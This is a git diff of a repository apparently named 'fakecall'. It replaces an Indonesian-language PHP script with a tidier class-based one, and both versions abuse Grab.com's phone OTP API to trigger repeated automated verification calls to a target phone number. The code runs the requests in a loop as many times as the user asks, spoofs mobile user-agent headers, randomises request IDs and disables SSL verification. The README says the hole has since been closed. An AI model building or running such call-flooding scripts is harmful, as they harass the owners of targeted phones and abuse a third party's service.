siputra12 · yazon30 · Dec 22, 2020 · Dec 22, 2020 · Dec 27, 2020 · Dec 27, 2020
diff --git a/README.md b/README.md
@@ -1,4 +1,11 @@
-# fakecall [CLI Version]
-# Note : Just For Fun
-# How To Run?
-# Use Ur Brain!
+![GitHub last commit](https://img.shields.io/github/last-commit/ValentinNikolaev/fakecall)
+![visitors](https://visitor-badge.laobi.icu/badge?page_id=ValentinNikolaev.fakecall)
+
+# Attention!!!
+# Backdoor has been closed by Grab.com (bounty hunting program). This script and others will not work. Doesn't matter - php, python or another other languages.
+
+### One-file fake call script for Grab.com [CLI Version, php 5.3+]
+``
+php call.php +1-202-555-0113
+``
+
diff --git a/call.php b/call.php
@@ -1,110 +1,176 @@
 <?php
-function get(){
-	return trim(fgets(STDIN));
+
+class PrankCall
+{
+
+    const GRAB_API = "https://api.grab.com/grabid/v1/phone/otp";
+    /**
+     * @var string $phone
+     */
+    private $phone;
+
+    private $supportedCountries = array("MY", "SG", "ID", "TH", "VN", "KH", "PH", "MM");
+
+    /**
+     * PrankCall constructor.
+     *
+     * @throws Exception
+     */
+    public function __construct()
+    {
+        if (!extension_loaded('curl')) {
+            throw new \Exception(
+                'Seems curl extension not loaded. See https://www.php.net/manual/en/curl.installation.php'
+            );
+        }
+
+        if (!ini_get("register_argc_argv")) {
+            throw new \Exception(
+                'Argv & argc variables disabled. See https://www.php.net/manual/en/reserved.variables.argv.php'
+            );
+        }
+    }
+
+    /**
+     * @throws Exception
+     */
+    public function run()
+    {
+        $this->initArgs();
+        echo "Phone: " . $this->phone . PHP_EOL;
+        echo "Times?" . PHP_EOL;
+        $times = (int)trim(fgets(STDIN));
+        if (!$times) {
+            echo "Exit... Times should be more then 0." . PHP_EOL;
+        }
+
+        $this->runMultiple($times);
+    }
+
+    /**
+     * @param int $iterations
+     */
+    private function runMultiple(
+        $iterations = 1
+    ) {
+        for ($i = 0; $i < $iterations; $i++) {
+            echo '--------------------- ' . ($i + 1) . ' --------------------' . PHP_EOL;
+            try {
+                $result = $this->makeCall();
+
+                if (empty($result['challengeID'])) {
+                    echo "Failed: " . json_encode($result) . PHP_EOL;
+                } else {
+                    echo "Success" . PHP_EOL;
+                }
+            } catch (\Exception $throwable) {
+                echo "CRITICAL: " . $throwable->getMessage() . PHP_EOL;
+            }
+
+            sleep(1);
+        }
+    }
+
+    /**
+     * @return mixed
+     * @throws Exception
+     */
+    private function makeCall()
+    {
+        $post = "method=CALL&countryCode=ID&phoneNumber=$this->phone&templateID=pax_android_production";
+
+        $headers = array(
+            "x-request-id: " . $this->v4(),
+            "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8",
+            "User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6264; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36",
+            "Content-Type: application/x-www-form-urlencoded",
+            "Content-Length: " . strlen($post),
+            "Host: api.grab.com",
+        );
+
+        $ch = curl_init();
+        curl_setopt($ch, CURLOPT_URL, self::GRAB_API);
+        curl_setopt($ch, CURLOPT_POST, 1);
+        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
+        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+        curl_setopt($ch, CURLOPT_FAILONERROR, true);
+        curl_setopt($ch, CURLINFO_HEADER_OUT, true);
+        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+        curl_setopt($ch, CURLOPT_VERBOSE, true);
+        $x = curl_exec($ch);
+
+        if ($x === false) {
+            $info = curl_getinfo($ch);
+            unset($info["request_header"]);
+            echo curl_getinfo($ch, CURLINFO_HEADER_OUT);
+            echo "INFO: " . json_encode($info) . PHP_EOL . PHP_EOL;
+            throw new \Exception('Curl error: ' . curl_error($ch));
+        }
+
+        curl_close($ch);
+        return json_decode($x, true);
+    }
+
+    /**
+     * @throws Exception
+     */
+    private function initArgs()
+    {
+        global $argv;
+        $phone = isset($argv[1]) ? trim((string)$argv[1]) : null;
+        if (is_null($phone) || strlen($phone) == 0) {
+            throw new \InvalidArgumentException(
+                'Phone missing. Please, write it as `call.php +1(650)253-0000`, without spaces'
+            );
+        }
+
+        $phone = preg_replace('/\D+/', '', $phone);
+        $this->phone = $this->fixNumber($phone);
+    }
+
+    private function fixNumber(
+        $no
+    ) {
+        $cek = substr($no, 0, 2);
+        if ($cek == "08") {
+            $no = "62" . substr($no, 1);
+        }
+        return $no;
+    }
+
+    /**
+     * @return string
+     */
+    private function v4()
+    {
+        return sprintf(
+            '%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
+
+            // 32 bits for "time_low"
+            mt_rand(0, 0xffff),
+            mt_rand(0, 0xffff),
+
+            // 16 bits for "time_mid"
+            mt_rand(0, 0xffff),
+
+            // 16 bits for "time_hi_and_version",
+            // four most significant bits holds version number 4
+            mt_rand(0, 0x0fff) | 0x4000,
+
+            // 16 bits, 8 bits for "clk_seq_hi_res",
+            // 8 bits for "clk_seq_low",
+            // two most significant bits holds zero and one for variant DCE1.1
+            mt_rand(0, 0x3fff) | 0x8000,
+
+            // 48 bits for "node"
+            mt_rand(0, 0xffff),
+            mt_rand(0, 0xffff),
+            mt_rand(0, 0xffff)
+        );
+    }
 }
-class prankCall{
-	public function __construct($no){
-		$this->number = $no;
-	}
-	private function get(){
-		return trim(fgets(STDIN));
-	}
-	private function correct($no){
-		$cek = substr($no,0,2);
-		if($cek=="08"){
-			$no = "62".substr($no,1);
-		}
-		return $no;
-	}
-	private function ekse(){
-		$no = $this->correct($this->number);
-		$rand = rand(0123456,9999999);
-		$rands = $this->randStr(12);
-		$post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production";
-		$h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands";
-		$h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8";
-		$h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)";
-		$h[] = "Content-Type: application/x-www-form-urlencoded";
-		$h[] = "Content-Length: ".strlen($post);
-		$h[] = "Host: api.grab.com";
-		$h[] = "Connection: close";
-		$ch = curl_init();
-		curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp");
-		curl_setopt($ch, CURLOPT_POST, 1);
-		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
-		curl_setopt($ch, CURLOPT_HTTPHEADER, $h);
-		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
-		$x = curl_exec($ch); curl_close($ch);
-		$ekse = json_decode($x,true);
-		if(empty($ekse['challengeID'])){
-			echo "Gagal\n";
-		}else{
-			echo "Sukses\n";
-		}
-	}
-	private function loop($many,$sleep=null){
-		$a=0;
-		$no = $this->correct($this->number);
-		while($a<$many){
-			$rand = rand(0123456,9999999);
-			$rands = $this->randStr(12);
-			$post = "method=CALL&countryCode=id&phoneNumber=$no&templateID=pax_android_production";
-			$h[] = "x-request-id: ebf61bc3-8092-4924-bf45-$rands";
-			$h[] = "Accept-Language: in-ID;q=1.0, en-us;q=0.9, en;q=0.8";
-			$h[] = "User-Agent: Grab/5.20.0 (Android 6.0.1; Build $rand)";
-			$h[] = "Content-Type: application/x-www-form-urlencoded";
-			$h[] = "Content-Length: ".strlen($post);
-			$h[] = "Host: api.grab.com";
-			$h[] = "Connection: close";
-			$ch = curl_init();
-			curl_setopt($ch, CURLOPT_URL, "https://api.grab.com/grabid/v1/phone/otp");
-			curl_setopt($ch, CURLOPT_POST, 1);
-			curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
-			curl_setopt($ch, CURLOPT_HTTPHEADER, $h);
-			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
-			$x = curl_exec($ch); curl_close($ch);
-			$ekse = json_decode($x,true);
-			if(empty($ekse['challengeID'])){
-				continue;
-			}else{
-				$nn = $a+1;
-				echo "[$nn] Sukses\r";
-				$a++;
-			}
-			if($sleep!=null) sleep($sleep);
-			if($a>=$many) echo "\nCompleted!\n";
-		}
-	}
-	private function randStr($l){
-		$data = "abcdefghijklmnopqrstuvwxyz1234567890";
-		$word = "";
-		for($a=0;$a<$l;$a++){
-			$word .= $data{rand(0,strlen($data)-1)};
-		}
-		return $word;
-	}
-	public function run(){
-		while(true){
-			echo "?Loop(y/n)		";
-			$loop = $this->get();
-			if($loop=="y" OR $loop=="n"){
-				break;
-			}else{
-				echo "Jika ya jawab y jika tidak jawab n\n";
-				continue;
-			}
-		}
-		if($loop=="y"){
-			echo "?Many			";
-			$many = $this->get();
-			$this->loop($many);
-		}else{
-			$this->ekse();
-		}
-	}
-}
-echo "#################################\n# Copyright : @xptra | SGB-Team #\n#################################\n";
-echo "?Number			";
-$no = get();
-$n = new prankCall($no);
-$n->run();
+
+
+$call = new PrankCall();
+$call->run();